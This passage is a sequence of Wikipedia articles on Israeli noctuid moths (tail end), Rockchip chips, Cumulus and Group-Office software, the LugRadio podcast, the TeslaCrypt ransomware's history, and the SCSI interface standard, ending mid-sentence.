1906) Xanthia pontica Kljutshko, 1968 Maraschia grisescens Osthelder, 1933 Agrochola litura (Linnaeus, 1761) Agrochola rupicarpa (Staudinger, 1879) Agrochola osthelderi Boursin, 1951 Agrochola macilenta (Hübner, 1809) Agrochola helvola (Linnaeus, 1758) Agrochola pauli (Staudinger, 1892) Agrochola scabra (Staudinger, 1892) Agrochola hypotaenia (Bytinsky-Salz, 1936) Agrochola lychnidis [Denis & Schiffermüller, 1775] Agrochola staudingeri Ronkay, 1984 Conistra acutula (Staudinger, 1892) Conistra veronicae (Hübner, 1813) Jodia croceago [Denis & Schiffermüller, 1775] Lithophane semibrunnea (Haworth, 1809) Lithophane lapidea (Hübner, 1808) Lithophane ledereri (Staudinger, 1892) Xylena exsoleta (Linnaeus, 1758) Xylena vetusta (Hübner, 1813) Evisa schawerdae Reisser, 1930 Rileyiana fovea (Treitschke, 1825) Dryobota labecula (Esper, 1788) Scotochrosta pulla [Denis & Schiffermüller, 1775] Dichonia pinkeri (Kobes, 1973) Dichonia aeruginea (Hübner, 1808) Dryobotodes eremita (Fabricius, 1775) Dryobotodes carbonis (F. Wagner, 1931) Dryobotodes tenebrosa (Esper, 1789) Pseudohadena eibinevoi Fibiger, Kravchenko & Muller, 2006 Pseudohadena jordana (Staudinger, 1900) Pseudohadena commoda (Staudinger, 1889) Antitype jonis (Lederer, 1865) Ammoconia senex (Geyer, 1828) Aporophyla canescens (Duponchel, 1826) Aporophyla nigra (Haworth, 1809) Aporophyla australis (Boisduval, 1829) Aporophyla dipsalea Wiltshire, 1941 Dasypolia ferdinandi Rühl, 1892 Polymixis manisadjiani (Staudinger, 1882) Polymixis subvenusta (Püngeler, 1906) Polymixis juditha (Staudinger, 1898) Polymixis rebecca (Staudinger, 1892) Polymixis steinhardti Kravchenko, Fibiger, Mooser & Müller, 2005 Polymixis ancepsoides Poole, 1989 Polymixis rufocincta (Geyer, 1828) Polymixis trisignata (Ménétriès, 1847) Polymixis serpentina (Treitschke, 1825) Polymixis apora (Staudinger, 1898) Polymixis lea (Staudinger, 1898) Polymixis aegyptiaca (Wiltshire, 1947) Polymixis epiphleps (Turati & Krüger, 1936) Mniotype compitalis (Draudt, 1909) Mniotype judaica (Staudinger, 1898) Mniotype johanna (Staudinger, 1898) Boursinia discordans (Boursin, 1940) Boursinia deceptrix (Staudinger, 1900) Boursinia lithoxylea (A. Bang-Haas, 1912) Wiltshireola praecipua Hacker & Kravchenko, 2001 Ostheldera gracilis (Osthelder, 1933) Metopoplus excelsa (Christoph, 1885) See also Noctuidae Moths Lepidoptera List of moths of Israel External links The Acronictinae, Bryophilinae, Hypenodinae and Hypeninae of Israel The Noctuinae of Israel The Plusinae of Israel Heliothinae of Israel Hadeninae of Israel Images Images, genus Catocala in Israel Eublemminae of Israel Checklist of Noctuidae of Israel Noctuidae
60580512
https://en.wikipedia.org/wiki/List%20of%20Rockchip%20products
List of Rockchip products
This is a list of Rockchip products. Products Featured products RK3399 RK3399 is the flagship SoC of Rockchip, Dual A72 and Quad A53 and Mali-T860MP4 GPU, providing high computing and multi-media performance, rich interfaces and peripherals. And software supports multiple APIs: OpenGL ES 3.2, Vulkan 1.0, OpenCL 1.1/1.2, OpenVX1.0, AI interfaces support TensorFlow Lite/AndroidNN API. RK3399 Linux source code and hardware documents are on GitHub and Wiki opensource website. RK3288 RK3288 is a high performance IoT platform, Quad-core Cortex-A17 CPU and Mali-T760MP4 GPU, 4K video decoding and 4K display out. It is applied to products of various industries including Vending Machine, Commercial Display, Medical Equipment, Gaming, Intelligent POS, Interactive Printer, Robot and Industrial Computer. RK3288 Linux source code and hardware documents are on GitHub and Wiki opensource website. RK3326 & PX30 RK3326 and PX30 are newly announced in 2018, designed for Smart AI solutions. PX30 is a variant of RK3326 targeting IoT market, supporting dual VOP. They are with Arm's new generation of CPU Cortex-A35 and GPU G31. The RK3326 is widely used in handheld consoles designed for emulation. RK3308 RK3308 is another newly released chipset targeting Smart AI solutions. It is an entry-level chipset aimed at mainstream devices. The chip has multiple audio input interfaces, and greater energy efficiency, featuring an embedded VAD (Voice Activation Detection). RV1108 The announcement of RV1108 indicated Rockchip's moves to AI/computer vision territory. With CEVA DSP embedded, RV1108 powers smart cameras including 360° Video Camera, IPC, Drone, Car Camcoder, Sport DV, VR, etc. It also has been deployed for new retail and intelligent marketing applications with integrated algorithms. RK1808 The RK1808 is Rockchip's first chip with Neural Processing Unit (NPU) for artificial intelligence applications. The RK1808 specifications include: Dual-core ARM Cortex-A35 CPU Neural Processing Unit (NPU) with up to 3.0 TOPs supporting INT8/INT16/FP16 hybrid operation 22 nm FD-SOI process VPU supporting 1080p video codec Built-in 2 MB system-level SRAM RK3530 The RK3530 is a SoC that will ship in Q3 2019 targeting the set-top box market. The RK3530 specifications include: 4x Cortex-A55 DynamIQ CPU Mali G52 GPU 14 LPP process RV1109 The RV1109 is a vision processor SoC that will ship in Q4 2019. The RV1109 specifications include: 14 LPP process NPU 2.0 ISP 2.0 VPU 2.0 capable of 4K H.264/H.265 RK3588 The RK3588 is a high-end SoC that will ship in Q1 2020. The RK3588 specifications include: 4x Cortex-A76 and 4x Cortex-A55 DynamIQ CPU NPU 2.0 8 LPP process VPU 2.0 supporting 8K video Built-in 2 MB system-level SRAM Early products RK26xx series - Released 2006. RK27xx series - Rockchip was first known for their RK 27xx series that was very efficient at MP3/MP4 decoding and was integrated in many low-cost personal media player (PMP) products. RK28xx series The RK2806 was targeted at PMPs. The RK2808A is an ARM926EJ-S derivative. Along with the ARM core a DSP coprocessor is included. The native clock speed is 560 MHz. ARM rates the performance of the ARM926EJ-S at 1.1 DMIPS/MHz the performance of the Rockchip 2808 when executing ARM instructions is therefore 660 DMIPS roughly 26% the speed of Apple's A4 processor. The DSP coprocessor can support the real-time decoding of 720p video files at bitrates of up to 2.5 Mbit/s. This chip was the core of many Android and Windows Mobile-based mobile internet devices. The RK2816 was targeted at PMP devices, and MIDs. It has the same specifications as the RK2806 but also includes HDMI output, Android support, and up to 720p hardware video acceleration. RK29xx series The Rockchip RK291x is a family of SoCs based on the ARM Cortex-A8 CPU core. They were presented for the first time at CES 2011. The RK292x are single core SoCs based on ARM Cortex-A9 and were first introduced in 2012. The RK2918 was the first chip to decode Google WebM VP8 in hardware. It uses a dynamically configurable companion core to process various codecs. It encodes and decodes H.264 at 1080p, and can decode many standard video formats including Xvid, H.263, AVS, MPEG4, RV, and WMV. It includes a Vivante GC800 GPU that is compatible with OpenGL ES 2.0 and OpenVG. The RK2918 is compatible with Android Froyo (2.2), Gingerbread (2.3), HoneyComb (3.x) and Ice Cream Sandwich (4.0). Unofficial support for Ubuntu and other Linux flavours exists. As of 2013, it was targeted at E-readers. The RK2906 is basically a cost-reduced version of the RK2918, also targeted at E-readers as of 2013. The Rockchip RK2926 and RK2928 feature a single core ARM Cortex A9 running at a speed up to 1.0 GHz. It replaces the Vivante GC800 GPU of the older RK291x series with an ARM Mali-400 GPU. As of 2013, the RK2926 was targeted at tablets, while the RK2928 was targeted at tablets and Android TV dongles and boxes. RK30xx series The RK3066 is a high performance dual-core ARM Cortex-A9 mobile processor similar to the Samsung Exynos 4 Dual Core chip. In terms of performance, the RK3066 is between the Samsung Exynos 4210 and the Samsung Exynos 4212. As of 2013, it was targeted at tablets and Android TV dongles and boxes. It has been a popular choice for both tablets and other devices since 2012. The RK3068 is a version of the RK3066 specifically targeted at Android TV dongles and boxes. Its package is much smaller than the RK3066. The RK3028 is a low-cost dual-core ARM Cortex-A9-based processor clocked at 1.0 GHz with ARM Mali-400 GPU. It is pin-compatible with the RK2928. It is used in a few kids tablets and low-cost Android HDMI TV dongles. The RK3026 is an updated ultra-low-end dual-core ARM Cortex-A9-based tablet processor clocked at 1.0 GHz with ARM Mali-400 MP2 GPU. Manufactured at 40 nm, it is pin-compatible with the RK2926. It features 1080p H.264 video encoding and 1080p decoding in multiple formats. Supporting Android 4.4, it has been adopted for low-end tablets in 2014. The RK3036 is a low-cost dual-core ARM Cortex-A7-based processor released in Q4 2014 for smart set-top boxes with support for H.265 video decoding. RK31xx series The RK3188 was the first product in the RK31xx series, announced for production in the 2nd quarter of 2013. The RK3188 features a quad-core ARM Cortex-A9 clocked up to 1.6 GHz frequency. It is targeted at tablets and Android TV dongles and boxes, and has been a popular choice for both tablets and other devices requiring good performance. 28 nm HKMG process at GlobalFoundries Quad-core ARM Cortex-A9, up to 1.6 GHz 512 KB L2 cache Mali-400 MP4 GPU, up to 600 MHz (typically 533 MHz) supporting OpenGL ES 1.1/2.0, Open G 1.1 High performance dedicated 2D processor DDR3, DDR3L, LPDDR2 support Dual-panel display up to 2048x1536 resolution The RK3188T is a lower-clocked version of the RK3188, with the CPU cores running at a maximum speed of 1.4 GHz instead of 1.6 GHz. The Mali-400MP4 GPU is also clocked at a lower speed. As of early 2014, many devices advertised as using a RK3188 with a maximum clock speed of 1.6 GHz actually have a RK3188T with clock speed limited to 1.4 GHz. Operating system ROMs specifically made for the RK3188 may not work correctly with a RK3188T. The RK3168, first shown in April 2013, is a dual-core Cortex A9-based CPU, also manufactured using the 28 nm process. It is targeted at low-end tablets. The chip has seen only limited use as of May 2014. The RK3126 is an entry-level tablet processor introduced in Q4 2014. Manufactured using a 40 nm process, it features a quad-core Cortex-A7 CPU up to 1.3 GHz and a Mali-400 MP2 GPU. It is pin-compatible with RK3026 and RK2926. 40 nm process Quad-core ARM Cortex-A7, up to 1.3 GHz Mali-400 MP2 GPU High performance dedicated 2D processor DDR3, DDR3L memory interface 1080p multi-format video decoding and 1080p video encoding for H.264 The RK3128 is a higher-end variant of RK3126, also to be introduced in Q4 2014, that features more integrated external interfaces, including CVBS, HDMI, Ethernet MAC, S/PDIF, Audio DAC, and USB. It targets more fully featured tablets and set-top boxes. RK32xx series Rockchip has announced the RK3288 for production in the second quarter of 2014. Recent information suggests that the chip uses a quad-core ARM Cortex-A17 CPU, although technically ARM Cortex-A12, which as of October 1, 2014, ARM has decided to also refer to as Cortex-A17 because the latest production version of Cortex-A12 performs at a similar performance level as Cortex-A17. 28 nm HKMG process. Quad-core ARM Cortex-A17, up to 1.8 GHz Quad-core ARM Mali-T760 MP4 (also incorrectly called Mali-T764) GPU clocked at 600 MHz supporting OpenGL ES 1.1/2.0/3.0/3.1, OpenCL 1.1, Renderscript, Direct3D 11.1 High performance dedicated 2D processor 1080P video encoding for H.264 and VP8, MVC 4K H.264 and 10 bits H.265 video decode, 1080p multi-video decode Supports 4Kx2K H.265 resolution Dual-channel DDR3, DDR3L, LPDDR2, LPDDR3 Up to 3840x2160 display output, HDMI 2.0 Inconsistent information about CPU cores used in RK3288 Early reports including Rockchip first suggested in summer 2013 that the RK3288 was originally designed using a quad-core ARM Cortex-A12 configuration. Rockchip's primary foundry partner GlobalFoundries announced a partnership with ARM to optimize the ARM Cortex-A12 for their 28 nm-SLP process. This is the same process used for earlier Rockchip chips such as the RK3188, and matches the choice of Cortex-A12 cores in the design of the RK3288. In January 2014, official marketing materials listed the CPU cores as ARM Cortex-A17. At the CES electronics show in January 2014, someone apparently corrected the CPU specification as being ARM Cortex-A12 instead of Cortex-A17 on one of the panels of their show booth. However, since then, official specifications from Rockchip's website and marketing materials as well specifications used by device manufacturers have continued to describe the CPU as a quad-core ARM Cortex-A17. Recent testing of early RK3288-based TV boxes (August/September 2014) provided evidence that the RK3288 technically contains Cortex-A12 cores, since the "ARM 0xc0d" CPU architecture reported by CPU-Z for Android is the reference for Cortex-A12, while the original Cortex-A17 is referred to as "ARM 0xc0e". However, on the ARM community website, ARM clarified the situation on October 1, 2014, saying that Cortex-A12, for which Rockchip is one of the few known customers, will be called Cortex-A17 from now on, and that all references to Cortex-A12 have been removed from ARM's website. ARM explained that the latest production revision of Cortex-A12 now performs close to the level of Cortex-A17 because the improvements of the Cortex-A17 now also have been applied to the latest version of Cortex-A12. In this way, Rockchip now gets the official blessing from ARM for listing the cores inside the RK3288 as Cortex-A17. The first Android TV stick based on RK3288 was launched in November 2014 ("ZERO Devices Z5C Thinko"). RK33xx series RK3368 Rockchip announced the first member of the RK33xx family at the CES show in January 2015. The RK3368 is a SoC targeting tablets and media boxes featuring a 64-bit octa-core Cortex-A53 CPU and an OpenGL ES 3.1-class GPU. Octa-Core Cortex-A53 64-bit CPU, up to 1.5 GHz PowerVR SGX6110 GPU with support for OpenGL 3.1 and OpenGL ES 3.0 28 nm process 4K UHD H.264/H.265 real-time video playback HDMI 2.0 for 4K@60 Hz with HDCP 1.4/2.2 RK3399 aka OP1 The RK3399 announced by ARM at Mobile World Congress in February 2016, features six 64 bit CPU cores, including 2 Cortex-A72 and 4 Cortex-A53. Dual Cortex-A72 + Quad Cortex-A53 64-bit CPU, up to 1.8 GHz Mali-T860 MP4 (also incorrectly called Mali-T864) GPU with support for OpenGL ES 1.1/2.0/3.0/3.1, OpenVG 1.1, OpenCL, DX11 4K VP9 and 4K 10 bits H.265/H.264 video decoders, up to 60 fps 1080p video encoders for H.264 and VP8 Dual 13 MP ISP and dual channel MIPI CSI-2 receive interface Consumer devices include: Asus Chromebook Flip C101PA-DB02 Asus Chromebook Tablet CT100 Samsung Chromebook Plus PINEBOOK Pro PINEPHONE Pro Open source commitment Rockchip provides open source software on GitHub and maintains a wiki Linux SDK website to offer free downloads of SoC hardware documents and software development resources as well as third-party development kit info. The chipsets available are RK3399, RK3288, RK3328 and RK3036. Markets and competition In the market for SoCs for tablets, Rockchip faces competition with Allwinner Technology, MediaTek, Intel, Actions Semiconductor, Spreadtrum, Leadcore Technology, Samsung Semiconductor, Qualcomm, Broadcom, VIA Technologies, UNISOC and Amlogic. After establishing a position early in the developing Chinese tablet SoC market, in 2012 it faced a challenge by Allwinner. In 2012, Rockchip shipped 10.5 million tablet processors, compared to 27.5 million for Allwinner. However, for Q3 2013, Rockchip was forecast to ship 6 million tablet-use application processors in China, compared to 7 million for Allwinner who mainly shipped single-core products. Rockchip was reported to be the number one supplier of tablet-use application processors in China in Q4 2013, Q1 2014 and Q2 2014. Chinese SoC suppliers that do not have cellular baseband technology are at a disadvantage compared to companies such as MediaTek that also supply the smartphone market as white-box tablet makers increasingly add phone or cellular data functionality to their products. Intel Corporation made investments into the tablet processor market, and was heavily subsidizing its entry into the low-cost tablet market as of 2014. Cooperation with Intel In May 2014, Intel announced an agreement with Rockchip to jointly deliver an Intel-branded mobile SoC platform based on Intel's Atom processor and 3G modem technology. Under the terms of the agreement, the two companies will deliver an Intel-branded mobile SoC platform. The quad-core platform will be based on an Intel Atom processor core integrated with Intel's 3G modem technology, and is expected to be available in the first half of 2015. Both Intel and Rockchip will sell the new part to OEMs and ODMs, primarily into each company's existing customer base. As of October 2014, Rockchip was already offering Intel's XMM 6321, for low-end smartphones. It has two chips: a dual-core application processor (either with Intel processor cores or ARM Cortex-A5 cores) with integrated modem (XG632) and an integrated RF chip (AG620) that originates from the cellular chip division of Infineon Technologies (which Intel acquired some time ago). The application processor may also originate from Infineon or Intel. Rockchip has not earlier targeted the smartphone space in a material way. List of Rockchip SoC ARMv7-A processors ARMv8-A processors Tablet processors with integrated modem References Rockchip ARM architecture X86 architecture System on a chip
5855366
https://en.wikipedia.org/wiki/Cumulus%20%28software%29
Cumulus (software)
Cumulus is a digital asset management software designed as a client/server system developed by Canto Software. The product line includes editions targeted to smaller organizations and larger enterprises. The product makes use of metadata for indexing, organizing, and searching. Cumulus servers run on macOS, Windows, and Linux systems. Cumulus client software is available for Mac, Windows, web browsers and iOS. History Cumulus was first released as a Macintosh application in 1992, and was named by Apple Computer as the "Most Innovative Product of 1992". Cumulus introduced search capabilities beyond those available in the Macintosh at the time, particularly relating to thumbnails. Cumulus 1.0 was a single-user product with no network capabilities. Among the main features of Cumulus 1.0, the search function automatically generated previews and contained support for the included AppleTalk – Peer-to-Peer – network Cumulus 2.5 was available in five different languages and received the 1993 MacUser magazine Eddy award for "Best Publishing & Graphics Utility". In 1995, Canto introduced the scanner software "Cirrus" to focus on the development of Cumulus. Cumulus 3, released in 1996, introduced a server version for the first time and contained the possibility to spread files over the Internet via the "Web Publisher". Since Apple offered Cumulus 3 with its "Workgroup Server" as a bundle, Cumulus became one of the leading digital asset management systems. Cumulus 4 was the first version that was network-ready, and was available for Macintosh, Windows and UNIX operating systems allowing for cross-platform file sharing. Released in 1998, the support of Solaris was discounted later. Cumulus 5 modified the software core to use an open architecture providing an API to external systems and databases. The open architecture of Cumulus 5 also enabled a more functional bridge between Cumulus and the Internet. Cumulus 6 introduced Embedded Java Plugin (EJaP) which allowed system integrators to build custom Java plug-ins to extend the functionality of the Cumulus client. Cumulus 6.5 marked the end of the Cumulus Single User Edition product, which was licensed to MediaDex for further development and distribution. Cumulus 7 was introduced in the Summer of 2006. Cumulus 8 was released in June 2009, including new indexation technologies and taking advantage of multicore/multiprocessors systems, and able to manage a wider variety of file formats. Cumulus 8.5 was released in May, 2011. Support was added for multilingual metadata, sometimes referred to as "World Metadata." Cumulus Sites was updated to support metadata editing and file uploads. Cumulus 8.6 was released in July 2012, and contains an updated user interface for the administration of Cumulus Sites and additional features for web-based administration of Cumulus. Other additions include features for collaboration links, multi-language support and automated version control. An integration tool – the Canto Integration Platform – that allows integration into existing systems and business processes with other enterprise solutions and web applications was released by Canto in June 2012. Cumulus 9 was released in September 2013 and introduced a new Web Client User Interface and the Cumulus Video Cloud. The Cumulus Web Client UI was redesigned to provide users with a modern, easy-to-use interface to support and guide the user while addressing modern business needs. The Cumulus Video Cloud extends the Cumulus video handling capabilities to add conversion and global streaming. Cumulus 9 also saw the addition of upload collection links which allow external collaborators to drag and drop files directly into Cumulus without needing a Cumulus account. Cumulus 9.1 was released in May 2014 and introduced the Adobe Drive Adapter for Cumulus which allows users to browse and search digital assets in Cumulus directly from Adobe work environments such as Photoshop, InDesign, Illustrator, Premier and other Adobe applications. Cumulus 10 (Cumulus X) was released July 2015 and introduced two mobile-friendly products: the Cumulus app and Portals. The Cumulus app is iOS and was released to allow users to collaborate either on an iPhone or iPad. Portals is the read-only version of the Cumulus Web Client where users can work with assets that admins allow. Cumulus 10.1 was introduced in January 2016 and included the InDesign Client integration where users can work with Adobe InDesign while accessing their assets from Cumulus. Cumulus 10.2 was introduced in September 2016 and brought the Media Delivery Cloud using Amazon Web Services. It allows users to manage their media rendition in a single source and distribute media files globally across different channels and devices. Cumulus 10.2.3 was released in February, 2017 and came with a crop and customize photos feature for Portals and the Web Client. Product Overview As a digital asset management software, Cumulus aims to cover the complete usage cycle of a file. This starts with the cataloging of the file via upload into the archive, where Cumulus transfers as much information about the file as possible from the metadata. For image or photo files, this is typically Exif and IPTC data. Cumulus also provides ways to import information from other file formats, such as PDF or Microsoft Office formats, and export the data in the PowerPoint, Quicktime, QuarkXPress, and RedDot. The metadata is mainly used to search the archive. The use of embargo data supports license management for copyrighted material. The managed files can be cataloged and their usage can be set. The indexing is based on a predefined taxonomy, which is governed by the internal rules of the organization or by industry standards. You can specify whether files can only be used for specific purposes or only by certain groups of people. The management system includes a version management for the production accompanying work with reworked files. Via the publication function, the files prepared for distribution can be distributed directly via links or e-mails. It's also possible to access from the outside via the Cumulus Portals web interface, which allows a read access to released content from the catalog. There are different variants, starting with the "Workgroup archive server" up to the "Enterprise Business Server" for large companies. The servers are available on the operating systems Windows, Linux, macOS (Fat Binaries) and Solaris, the clients under Windows and macOS. Both server and client are extensible through a Java-based plug-in architecture. Since version 7.0, there is a web application based on Ajax with a separate user interface. For access to the Cumulus catalog on mobile, there has been an application for Apple devices based on iOS since 2010. Other In 2015, Cumulus developer, Canto, established the first Canto digital asset management (DAM) event. The event is held annually in Berlin. The Henry Stewart team has been hosting DAM conferences since at least 2006 See also Comparison of image viewers References External links Graphics software Information technology management
8718562
https://en.wikipedia.org/wiki/LugRadio
LugRadio
LugRadio was a British podcast on the topic of Linux and events in the free and open source software communities, as well as coverage of technology, digital rights and politics. The show was launched in 2004 as a result of discussions between several members of the Wolverhampton Linux User Group. After five seasons, on 30 June 2008, LugRadio announced that they would end the show at their convention, LugRadio Live UK 2008. The show was presented by Jono Bacon, Stuart Langridge, Chris Procter and Adam Sweet. Jono Bacon and Stuart Langridge are the only two presenters who were with the show throughout, with Jono Bacon being the only presenter to appear on every show. Previous regular presenters were Matthew Revell (Seasons 1 - 4), Adrian Bradshaw (Seasons 2 - 4) and Stephen Parkes (Season 1, and the first few shows of Season 2). The show has also featured a number of guest presenters. Guests have included Ximian co-founder Nat Friedman, Google Open Source program manager Chris DiBona, Sun Head of Open Source Strategy Simon Phipps and Eric Raymond among others. History LugRadio was conceived by Jono Bacon and Matthew Revell in 2003. The pair met at Wolverhampton Linux User Group and it was agreed that Stuart Langridge and Stephen Parkes would complete the line-up. The first show, called The Phantom Message, was released on 26 February 2004. Most releases of the show were licensed under the Creative Commons Attribution Non-Commercial No-Derivatives licence, but shows released after December 2007 are under the Attribution-Share Alike 3.0 Unported licence. An effort was made to relicense earlier content under the same license where possible. Media coverage and awards LugRadio received coverage in Linux Format magazine, Linux User and Developer magazine and Linux Magazine as well as online coverage by sites such as Slashdot. An episode of LugRadio was included on the cover CD of Linux User and Developer magazine. In 2006, LugRadio won the award for Best Marketing Campaign at the UK Linux and Open Source Awards in London and won the award for Best Linux Podcast in the Christmas 2007 edition of Linux Format magazine. LugRadio Live LugRadio Live was an annual event organised by the LugRadio team and held in Wolverhampton. It was a Linux, Free Software and Open Source event intended to be fun, without the corporate agenda held by other commercial events. It was first held in 2005 with 250 attendees, 14 speakers — including Mark Shuttleworth, who arrived by helicopter — and 18 exhibitors including Ubuntu, Debian, KDE and O'Reilly. In 2006 LugRadio Live saw around 400 attendees, over 30 speakers including Michael Meeks and 27 exhibitors including Ubuntu, OpenSolaris, KDE, MythTV, Debian, Fedora and GNOME. LugRadio Live 2007 took place on 7–8 July 2007 at the Light House Media Centre, Wolverhampton attracting hundreds of attendees from around the world. Speakers included Chris DiBona (Google), Gervase Markham (Mozilla) and a representative from the Department for Communities and Local Government. LugRadio Live USA 2008 took place on 12–13 April 2008 at The Metreon in San Francisco. The wide selection of speakers included many celebrities including Miguel de Icaza, Robert Love, Ian Murdock, and Jeremy Allison. The show attracted about five hundred Linux enthusiasts from many countries around the world with several travelling from as far as Europe and Australia. LugRadio Live UK 2008 took place on the weekend of 19 July 2008 in Wolverhampton at the Light House Media Centre. LugRadio Live 2009 took place on 24 October 2009 in Wolverhampton at the Newhampton Arts Centre. References External links Technology podcasts 2004 podcast debuts Audio podcasts
8146158
https://en.wikipedia.org/wiki/Group-Office
Group-Office
Group-Office is a PHP based dual license commercial/open source groupware and CRM and DMS product developed by the Dutch company Intermesh. The open source version, Group-Office Community, is licensed under the AGPL, and is available via SourceForge. GroupOffice Professional is a commercial product and offers additionally mobile synchronisation, project management and time tracking. The online suite puts independent office applications onto a central server, making them accessible through a web browser. The suite includes file management, address book, calendar, email notes and website content management modules. The email client has IMAP and S/MIME support, the calendar supports iCalendar import, and it can be synchronised with personal digital assistants, mobile phones, and Microsoft Outlook. In the Professional version, it is possible to create templates to export to Open Document Format or Microsoft Word. Files can be managed in an inbuilt file manager, and accessed through WebDAV. Users may be managed within the application or in an LDAP system. A LAMP environment is recommended on the server, and an OSNews.com review describes the installation process as "straightforward". Linux is recommended as the system software, but it also runs on other Unix systems, including BSD Unix, and Mac OS X. From version 2.17 and up, Microsoft Windows is also supported as the system software. In March 2010 Group-Office was compared to other collaborative software in the German c't magazine. A special version was included for the bundled DVD. As of November 2012, the project has had over 420,000 downloads from SourceForge since its public appearance in March 2003. SourceForge made a blog post about Group-Office in 2010. Group-Office has had a stall and presentations at Linux Wochen 2005 in Vienna. and OSC2005 in Tokyo. The software has been translated into 27 locale with local communities in Japan and Austria. Version 2.13 of the software was included in the Dutch The Open CD. Mid 2012, Group-Office 4.0 was released. The PHP framework was completely rewritten using the Model View Controller design pattern. Version 4 was reviewed by PC World The software packages are maintained by a small team at Intermesh and has a small developer community, which is contributing features. The headquarters are located in 's-Hertogenbosch, The Netherlands. See also List of collaborative software Comparison of time-tracking software References External links Sourceforge.net blog post about Group-Office comparison of the Professional and the Community versions A video about Group-Office by an italian WebTv channel, called ICTv Collaboration Groupware Free content management systems Free software programmed in PHP Web applications Free groupware Free email software Software using the GNU AGPL license
45667045
https://en.wikipedia.org/wiki/TeslaCrypt
TeslaCrypt
TeslaCrypt was a ransomware trojan. It is now defunct, and its master key was released by the developers. In its early forms, TeslaCrypt targeted game-play data for specific computer games. Newer variants of the malware also affect other file types. In its original, game-player campaign, upon infection the malware searched for 185 file extensions related to 40 different games, which include the Call of Duty series, World of Warcraft, Minecraft and World of Tanks, and encrypted such files. The files targeted involve the save data, player profiles, custom maps and game mods stored on the victim's hard drives. Newer variants of TeslaCrypt were not focused on computer games alone but also encrypted Word, PDF, JPEG and other files. In all cases, the victim would then be prompted to pay a ransom of $500 worth of bitcoins in order to obtain the key to decrypt the files. Although resembling CryptoLocker in form and function, Teslacrypt shares no code with CryptoLocker and was developed independently. The malware infected computers via the Angler Adobe Flash exploit. Even though the ransomware claimed TeslaCrypt used asymmetric encryption, researchers from Cisco's Talos Group found that symmetric encryption was used and developed a decryption tool for it. This "deficiency" was changed in version 2.0, rendering it impossible to decrypt files affected by TeslaCrypt-2.0. By November 2015, security researchers from Kaspersky had been quietly circulating that there was a new weakness in version 2.0, but carefully keeping that knowledge away from the malware developer so that they could not fix the flaw. As of January 2016, a new version 3.0 was discovered that had fixed the flaw. A full behavior report, which shows BehaviorGraphs and ExecutionGraphs was published by JoeSecurity. Shut down In May 2016, the developers of TeslaCrypt shut down the ransomware and released the master decryption key, thus bringing an end to the ransomware. After a few days, ESET released a public tool to decrypt affected computers at no charge. References Blackmail Windows malware Cryptographic attacks 2015 in computing Ransomware
28313
https://en.wikipedia.org/wiki/SCSI
SCSI
Small Computer System Interface (SCSI, ) is a set of standards for physically connecting and transferring data between computers and peripheral devices. The SCSI standards define commands, protocols, electrical, optical and logical interfaces. The SCSI standard defines command sets for specific peripheral device types; the presence of "unknown" as one of these types means that in theory it can be used as an interface to almost any device, but the standard is highly pragmatic and addressed toward commercial requirements. The initial Parallel SCSI was most commonly used for hard disk drives and tape drives, but it can connect a wide range of other devices, including scanners and CD drives, although not all controllers can handle all devices. The ancestral SCSI standard, X3.131-1986, generally referred to as SCSI-1, was published by the X3T9 technical committee of the American National Standards Institute (ANSI) in 1986. SCSI-2 was published in August 1990 as X3.T9.2/86-109, with further revisions in 1994 and subsequent adoption of a multitude of interfaces. Further refinements have resulted in improvements in performance and support for ever-increasing storage data capacity. History Parallel interface SCSI is derived from "SASI", the "Shugart Associates System Interface", developed beginning 1979 and publicly disclosed in 1981. Larry Boucher is considered to be the "father" of SASI and ultimately SCSI due to his pioneering work first at Shugart Associates and then at Adaptec. A SASI controller provided a bridge between a hard disk drive's low-level interface and a host computer, which needed to read blocks of data. SASI controller boards were typically the size of a hard disk drive and were usually physically mounted to the drive's chassis. SASI, which was used in mini- and early microcomputers, defined the interface as using a 50-pin flat ribbon connector which was adopted as the SCSI-1 connector. SASI is a fully compliant subset of SCSI-1 so that many, if not all, of the then-existing SASI controllers were SCSI-1 compatible. Until at least February 1982, ANSI developed the specification as "SASI" and "Shugart Associates System Interface" however, the committee documenting the standard would not allow it to be named after a company. Almost a full day was devoted to agreeing to name the standard "Small Computer System Interface", which Boucher intended to be pronounced "sexy", but ENDL's Dal Allan pronounced the new acronym as "scuzzy" and that stuck. A number of companies such as NCR Corporation, Adaptec and Optimem were early supporters of SCSI. The NCR facility in Wichita, Kansas is widely thought to have developed the industry's first SCSI controller chip; it worked the first time. The "small" reference in "small computer system interface" is historical; since the mid-1990s, SCSI has been available on even the largest of computer systems. Since its standardization in 1986, SCSI has been commonly used in the Amiga, Atari, Apple Macintosh and Sun Microsystems computer lines and PC server systems. Apple started using the less-expensive parallel ATA (PATA, also known as IDE) for its low-end machines with the Macintosh Quadra 630 in 1994, and added it to its high-end desktops starting with the Power Macintosh G3 in 1997. Apple dropped on-board SCSI completely in favor of IDE and FireWire with the (Blue & White) Power Mac G3 in 1999, while still offering a PCI SCSI host adapter as an option on up to the Power Macintosh G4 (AGP Graphics) models. Sun switched its lower-end range to Serial ATA (SATA). Commodore included SCSI on the Amiga 3000/3000T systems and it was an add-on to previous Amiga 500/2000 models. Starting with the Amiga 600/1200/4000 systems Commodore switched to the IDE interface. Atari included SCSI as standard in its Atari MEGA STE, Atari TT and Atari Falcon computer models. SCSI has never been popular in the low-priced IBM PC world, owing to the lower cost and adequate performance of ATA hard disk standard. However, SCSI drives and even SCSI RAIDs became common in PC workstations for video or audio production. Modern SCSI Recent physical versions of SCSISerial Attached SCSI (SAS), SCSI-over-Fibre Channel Protocol (FCP), and USB Attached SCSI (UAS)break from the traditional parallel SCSI bus and perform data transfer via serial communications using point-to-point links. Although much of the SCSI documentation talks about the parallel interface, all modern development efforts use serial interfaces. Serial interfaces have a number of advantages over parallel SCSI, including higher data rates, simplified cabling, longer reach, improved fault isolation and full-duplex capability. The primary reason for the shift to serial interfaces is the clock skew issue of high speed parallel interfaces, which makes the faster variants of parallel SCSI susceptible to problems caused by cabling and termination. The non-physical iSCSI preserves the basic SCSI paradigm, especially the command set, almost unchanged, through embedding of SCSI-3 over TCP/IP. Therefore, iSCSI uses logical connections instead of physical links and can run on top of any network supporting IP. The actual physical links are realized on lower network layers, independently from iSCSI. Predominantly, Ethernet is used which is also of serial nature. SCSI is popular on high-performance workstations, servers, and storage appliances. Almost all RAID subsystems on servers have used some kind of SCSI hard disk drives for decades (initially Parallel SCSI, interim Fibre Channel, recently SAS), though a number of manufacturers offer SATA-based RAID subsystems as a cheaper option. Moreover, SAS offers compatibility with SATA devices, creating a much broader range of options for RAID subsystems together with the existence of nearline 